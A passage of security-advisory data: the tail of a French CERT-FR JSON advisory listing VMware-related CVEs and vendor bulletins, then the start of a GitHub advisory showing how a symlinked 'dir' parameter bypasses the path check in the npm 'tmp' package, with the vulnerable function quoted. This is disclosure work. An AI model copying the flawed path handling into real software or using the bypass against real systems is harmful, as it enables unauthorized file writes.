"url": "https://www.cve.org/CVERecord?id=CVE-2023-0217"
},
{
"name": "CVE-2024-58266",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-58266"
},
{
"name": "CVE-2025-50098",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-50098"
},
{
"name": "CVE-2022-21291",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-21291"
},
{
"name": "CVE-2025-50086",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-50086"
},
{
"name": "CVE-2022-3786",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-3786"
},
{
"name": "CVE-2023-38552",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-38552"
},
{
"name": "CVE-2021-35565",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-35565"
},
{
"name": "CVE-2025-47906",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-47906"
},
{
"name": "CVE-2025-58446",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-58446"
},
{
"name": "CVE-2025-8194",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-8194"
},
{
"name": "CVE-2024-3446",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-3446"
},
{
"name": "CVE-2025-50082",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-50082"
},
{
"name": "CVE-2025-40027",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40027"
},
{
"name": "CVE-2025-50097",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-50097"
},
{
"name": "CVE-2025-50181",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-50181"
},
{
"name": "CVE-2025-50084",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-50084"
},
{
"name": "CVE-2025-50079",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-50079"
},
{
"name": "CVE-2025-1795",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-1795"
},
{
"name": "CVE-2021-35603",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-35603"
},
{
"name": "CVE-2023-22067",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-22067"
},
{
"name": "CVE-2025-4517",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-4517"
},
{
"name": "CVE-2025-55193",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-55193"
},
{
"name": "CVE-2025-21574",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21574"
},
{
"name": "CVE-2024-22019",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-22019"
},
{
"name": "CVE-2025-4674",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-4674"
},
{
"name": "CVE-2020-2754",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-2754"
},
{
"name": "CVE-2020-14796",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-14796"
},
{
"name": "CVE-2025-21580",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21580"
},
{
"name": "CVE-2022-29526",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-29526"
},
{
"name": "CVE-2025-55754",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-55754"
},
{
"name": "CVE-2025-53023",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-53023"
},
{
"name": "CVE-2025-21575",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21575"
},
{
"name": "CVE-2025-4435",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-4435"
},
{
"name": "CVE-2025-21577",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21577"
},
{
"name": "CVE-2022-21628",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-21628"
},
{
"name": "CVE-2024-4467",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-4467"
},
{
"name": "CVE-2024-21011",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21011"
},
{
"name": "CVE-2024-45336",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45336"
},
{
"name": "CVE-2021-2369",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-2369"
},
{
"name": "CVE-2025-22868",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22868"
},
{
"name": "CVE-2024-12718",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-12718"
},
{
"name": "CVE-2024-27983",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-27983"
},
{
"name": "CVE-2025-23085",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-23085"
},
{
"name": "CVE-2024-0450",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-0450"
},
{
"name": "CVE-2024-5642",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-5642"
},
{
"name": "CVE-2025-59425",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-59425"
},
{
"name": "CVE-2024-3219",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-3219"
},
{
"name": "CVE-2025-50096",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-50096"
},
{
"name": "CVE-2024-47554",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-47554"
},
{
"name": "CVE-2025-9232",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-9232"
},
{
"name": "CVE-2025-23165",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-23165"
},
{
"name": "CVE-2023-30584",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-30584"
},
{
"name": "CVE-2025-61795",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61795"
},
{
"name": "CVE-2025-30705",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30705"
},
{
"name": "CVE-2025-8713",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-8713"
},
{
"name": "CVE-2025-21587",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21587"
},
{
"name": "CVE-2025-50088",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-50088"
},
{
"name": "CVE-2024-21892",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21892"
},
{
"name": "CVE-2024-45337",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45337"
},
{
"name": "CVE-2024-21147",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21147"
},
{
"name": "CVE-2024-27982",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-27982"
},
{
"name": "CVE-2020-14581",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-14581"
},
{
"name": "CVE-2024-37372",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-37372"
},
{
"name": "CVE-2025-50077",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-50077"
},
{
"name": "CVE-2025-23083",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-23083"
},
{
"name": "CVE-2021-2388",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-2388"
},
{
"name": "CVE-2025-50092",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-50092"
},
{
"name": "CVE-2025-50099",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-50099"
},
{
"name": "CVE-2021-35588",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-35588"
},
{
"name": "CVE-2025-41244",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-41244"
},
{
"name": "CVE-2024-21140",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21140"
},
{
"name": "CVE-2025-30684",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30684"
},
{
"name": "CVE-2024-21094",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21094"
},
{
"name": "CVE-2025-48989",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-48989"
},
{
"name": "CVE-2022-21365",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-21365"
},
{
"name": "CVE-2025-50093",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-50093"
},
{
"name": "CVE-2025-22874",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22874"
},
{
"name": "CVE-2020-14782",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-14782"
},
{
"name": "CVE-2025-50059",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-50059"
},
{
"name": "CVE-2025-21579",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21579"
},
{
"name": "CVE-2023-21937",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-21937"
},
{
"name": "CVE-2025-30761",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30761"
},
{
"name": "CVE-2025-50087",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-50087"
},
{
"name": "CVE-2024-47535",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-47535"
},
{
"name": "CVE-2022-4450",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-4450"
},
{
"name": "CVE-2024-7592",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-7592"
},
{
"name": "CVE-2023-2650",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-2650"
},
{
"name": "CVE-2022-21434",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-21434"
},
{
"name": "CVE-2025-54410",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-54410"
},
{
"name": "CVE-2023-52970",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52970"
},
{
"name": "CVE-2022-3996",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-3996"
},
{
"name": "CVE-2025-52434",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-52434"
},
{
"name": "CVE-2022-21294",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-21294"
},
{
"name": "CVE-2025-30698",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30698"
},
{
"name": "CVE-2020-2755",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-2755"
},
{
"name": "CVE-2025-8714",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-8714"
},
{
"name": "CVE-2024-43485",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43485"
},
{
"name": "CVE-2020-14779",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-14779"
},
{
"name": "CVE-2025-4673",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-4673"
},
{
"name": "CVE-2023-22045",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-22045"
},
{
"name": "CVE-2025-30721",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30721"
},
{
"name": "CVE-2025-58056",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-58056"
},
{
"name": "CVE-2025-22871",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22871"
},
{
"name": "CVE-2024-21138",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21138"
},
{
"name": "CVE-2025-50091",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-50091"
},
{
"name": "CVE-2024-22018",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-22018"
},
{
"name": "CVE-2023-22049",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-22049"
},
{
"name": "CVE-2022-21341",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-21341"
},
{
"name": "CVE-2025-23166",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-23166"
},
{
"name": "CVE-2021-35578",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-35578"
},
{
"name": "CVE-2024-0397",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-0397"
},
{
"name": "CVE-2020-14583",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-14583"
},
{
"name": "CVE-2022-21340",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-21340"
},
{
"name": "CVE-2024-12254",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-12254"
},
{
"name": "CVE-2025-4516",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-4516"
},
{
"name": "CVE-2025-22869",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22869"
},
{
"name": "CVE-2022-3358",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-3358"
},
{
"name": "CVE-2022-21293",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-21293"
},
{
"name": "CVE-2022-2097",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-2097"
},
{
"name": "CVE-2025-50104",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-50104"
},
{
"name": "CVE-2020-2800",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-2800"
},
{
"name": "CVE-2025-6242",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-6242"
},
{
"name": "CVE-2025-61772",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61772"
},
{
"name": "CVE-2025-30722",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30722"
},
{
"name": "CVE-2024-21145",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21145"
},
{
"name": "CVE-2022-21282",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-21282"
},
{
"name": "CVE-2022-21349",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-21349"
},
{
"name": "CVE-2024-50602",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-50602"
},
{
"name": "CVE-2024-21891",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21891"
},
{
"name": "CVE-2025-22870",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22870"
},
{
"name": "CVE-2025-30687",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30687"
},
{
"name": "CVE-2023-21968",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-21968"
},
{
"name": "CVE-2025-50101",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-50101"
},
{
"name": "CVE-2025-30749",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30749"
},
{
"name": "CVE-2025-61748",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61748"
},
{
"name": "CVE-2025-4207",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-4207"
},
{
"name": "CVE-2025-9230",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-9230"
},
{
"name": "CVE-2025-27789",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-27789"
},
{
"name": "CVE-2022-21248",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-21248"
},
{
"name": "CVE-2023-21930",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-21930"
},
{
"name": "CVE-2024-22017",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-22017"
},
{
"name": "CVE-2025-8916",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-8916"
},
{
"name": "CVE-2025-8885",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-8885"
},
{
"name": "CVE-2024-20918",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-20918"
},
{
"name": "CVE-2025-41249",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-41249"
},
{
"name": "CVE-2025-30704",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30704"
},
{
"name": "CVE-2021-35564",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-35564"
},
{
"name": "CVE-2023-52969",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52969"
},
{
"name": "CVE-2025-46551",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-46551"
},
{
"name": "CVE-2025-30693",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30693"
},
{
"name": "CVE-2025-21585",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21585"
},
{
"name": "CVE-2025-53506",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-53506"
},
{
"name": "CVE-2025-23084",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-23084"
},
{
"name": "CVE-2022-3602",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-3602"
},
{
"name": "CVE-2025-1094",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-1094"
},
{
"name": "CVE-2022-1434",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-1434"
},
{
"name": "CVE-2020-2757",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-2757"
},
{
"name": "CVE-2025-53864",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-53864"
},
{
"name": "CVE-2024-4032",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-4032"
},
{
"name": "CVE-2025-40025",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40025"
},
{
"name": "CVE-2025-61620",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61620"
},
{
"name": "CVE-2021-35556",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-35556"
},
{
"name": "CVE-2024-8244",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-8244"
},
{
"name": "CVE-2024-21085",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21085"
},
{
"name": "CVE-2025-21502",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21502"
},
{
"name": "CVE-2023-39331",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-39331"
},
{
"name": "CVE-2025-55315",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-55315"
},
{
"name": "CVE-2021-35560",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-35560"
},
{
"name": "CVE-2025-21581",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21581"
},
{
"name": "CVE-2024-20945",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-20945"
},
{
"name": "CVE-2025-58754",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-58754"
},
{
"name": "CVE-2024-21131",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21131"
},
{
"name": "CVE-2025-41242",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-41242"
},
{
"name": "CVE-2024-21210",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21210"
},
{
"name": "CVE-2025-53057",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-53057"
},
{
"name": "CVE-2023-39332",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-39332"
},
{
"name": "CVE-2020-2756",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-2756"
},
{
"name": "CVE-2024-27980",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-27980"
},
{
"name": "CVE-2023-21967",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-21967"
},
{
"name": "CVE-2025-30685",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30685"
},
{
"name": "CVE-2023-39333",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-39333"
},
{
"name": "CVE-2022-21619",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-21619"
},
{
"name": "CVE-2025-30695",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30695"
},
{
"name": "CVE-2025-30688",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30688"
},
{
"name": "CVE-2023-5752",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-5752"
},
{
"name": "CVE-2025-61780",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61780"
},
{
"name": "CVE-2021-35561",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-35561"
},
{
"name": "CVE-2022-21476",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-21476"
},
{
"name": "CVE-2025-53066",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-53066"
},
{
"name": "CVE-2024-21217",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21217"
},
{
"name": "CVE-2023-6597",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-6597"
},
{
"name": "CVE-2024-20952",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-20952"
},
{
"name": "CVE-2022-21541",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-21541"
},
{
"name": "CVE-2025-27221",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-27221"
},
{
"name": "CVE-2022-21360",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-21360"
},
{
"name": "CVE-2022-21296",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-21296"
},
{
"name": "CVE-2022-21540",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-21540"
},
{
"name": "CVE-2025-50083",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-50083"
},
{
"name": "CVE-2024-21208",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21208"
},
{
"name": "CVE-2024-36137",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-36137"
},
{
"name": "CVE-2020-14577",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-14577"
},
{
"name": "CVE-2025-49014",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-49014"
},
{
"name": "CVE-2024-6923",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-6923"
},
{
"name": "CVE-2024-8088",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-8088"
}
],
"initial_release_date": "2025-11-05T00:00:00",
"last_revision_date": "2025-11-05T00:00:00",
"links": [],
"reference": "CERTFR-2025-AVI-0967",
"revisions": [
{
"description": "Version initiale",
"revision_date": "2025-11-05T00:00:00.000000"
}
],
"risks": [
{
"description": "Non sp\u00e9cifi\u00e9 par l\u0027\u00e9diteur"
}
],
"summary": "De multiples vuln\u00e9rabilit\u00e9s ont \u00e9t\u00e9 d\u00e9couvertes dans les produits VMware. Elles permettent \u00e0 un attaquant de provoquer un probl\u00e8me de s\u00e9curit\u00e9 non sp\u00e9cifi\u00e9 par l\u0027\u00e9diteur.",
"title": "Multiples vuln\u00e9rabilit\u00e9s dans les produits VMware",
"vendor_advisories": [
{
"published_at": "2025-11-05",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36323",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36323"
},
{
"published_at": "2025-11-05",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36343",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36343"
},
{
"published_at": "2025-11-05",
"title": "Bulletin de s\u00e9curit\u00e9 VMware DSA-2025-99",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36326"
},
{
"published_at": "2025-11-04",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36305",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36305"
},
{
"published_at": "2025-11-05",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36345",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36345"
},
{
"published_at": "2025-11-05",
"title": "Bulletin de s\u00e9curit\u00e9 VMware DSA-2025-53",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36329"
},
{
"published_at": "2025-11-05",
"title": "Bulletin de s\u00e9curit\u00e9 VMware DSA-2025-81",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36316"
},
{
"published_at": "2025-11-05",
"title": "Bulletin de s\u00e9curit\u00e9 VMware DSA-2024-41",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36331"
},
{
"published_at": "2025-11-05",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36334",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36334"
},
{
"published_at": "2025-11-05",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36335",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36335"
},
{
"published_at": "2025-11-05",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36340",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36340"
},
{
"published_at": "2025-11-05",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36319",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36319"
},
{
"published_at": "2025-11-05",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36339",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36339"
},
{
"published_at": "2025-11-05",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36322",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36322"
},
{
"published_at": "2025-11-05",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36321",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36321"
},
{
"published_at": "2025-11-05",
"title": "Bulletin de s\u00e9curit\u00e9 VMware DSA-2025-68",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36324"
},
{
"published_at": "2025-11-05",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36336",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36336"
},
{
"published_at": "2025-11-05",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36318",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36318"
},
{
"published_at": "2025-11-05",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36337",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36337"
},
{
"published_at": "2025-11-05",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36346",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36346"
},
{
"published_at": "2025-11-05",
"title": "Bulletin de s\u00e9curit\u00e9 VMware DSA-2025-81",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36315"
},
{
"published_at": "2025-11-05",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36317",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36317"
},
{
"published_at": "2025-11-05",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36344",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36344"
},
{
"published_at": "2025-11-05",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36341",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36341"
},
{
"published_at": "2025-11-05",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36314",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36314"
},
{
"published_at": "2025-11-05",
"title": "Bulletin de s\u00e9curit\u00e9 VMware DSA-2024-41",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36330"
},
{
"published_at": "2025-11-05",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36332",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36332"
},
{
"published_at": "2025-11-04",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36304",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36304"
},
{
"published_at": "2025-11-05",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36342",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36342"
},
{
"published_at": "2025-11-05",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36333",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36333"
},
{
"published_at": "2025-11-05",
"title": "Bulletin de s\u00e9curit\u00e9 VMware DSA-2025-99",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36327"
},
{
"published_at": "2025-11-05",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36338",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36338"
},
{
"published_at": "2025-11-05",
"title": "Bulletin de s\u00e9curit\u00e9 VMware DSA-2025-53",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36328"
},
{
"published_at": "2025-11-05",
"title": "Bulletin de s\u00e9curit\u00e9 VMware DSA-2025-68",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36325"
}
]
}
ghsa-52f5-9888-hmc6
Vulnerability from github
Published
2025-08-06 17:06
Modified
2025-11-03 21:34
Severity ?
VLAI Severity ?
Summary
tmp allows arbitrary temporary file / directory write via symbolic link `dir` parameter
Details
Summary
tmp@0.2.3 is vulnerable to an Arbitrary temporary file / directory write via symbolic link dir parameter.
Details
According to the documentation there are some conditions that must be held:
``` // https://github.com/raszi/node-tmp/blob/v0.2.3/README.md?plain=1#L41-L50
Other breaking changes, i.e.
- template must be relative to tmpdir
- name must be relative to tmpdir
- dir option must be relative to tmpdir //<-- this assumption can be bypassed using symlinks
are still in place.
In order to override the system's tmpdir, you will have to use the newly introduced tmpdir option.
// https://github.com/raszi/node-tmp/blob/v0.2.3/README.md?plain=1#L375
* dir: the optional temporary directory that must be relative to the system's default temporary directory.
absolute paths are fine as long as they point to a location under the system's default temporary directory.
Any directories along the so specified path must exist, otherwise a ENOENT error will be thrown upon access,
as tmp will not check the availability of the path, nor will it establish the requested path for you.
```
Related issue: https://github.com/raszi/node-tmp/issues/207.
The issue occurs because _resolvePath does not properly handle symbolic link when resolving paths:
js
// https://github.com/raszi/node-tmp/blob/v0.2.3/lib/tmp.js#L573-L579
function _resolvePath(name, tmpDir) {
if (name.startsWith(tmpDir)) {
return path.resolve(name);
} else {
return path.resolve(path.join(tmpDir, name));
}
}
If the dir parameter points to a symlink that resolves to a folder outside the tmpDir, it's possible to bypass the _assertIsRelative check used in _assertAndSanitizeOptions:
js
